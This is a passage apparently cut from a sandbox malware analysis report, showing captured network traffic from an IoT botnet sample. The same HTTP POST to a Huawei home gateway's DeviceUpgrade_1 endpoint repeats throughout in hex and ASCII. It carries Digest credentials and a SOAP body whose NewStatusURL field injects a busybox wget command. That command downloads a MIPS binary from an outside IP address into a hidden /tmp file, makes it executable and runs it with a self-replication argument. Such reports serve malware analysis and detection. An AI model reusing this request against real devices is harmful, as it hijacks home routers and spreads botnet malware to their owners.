65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 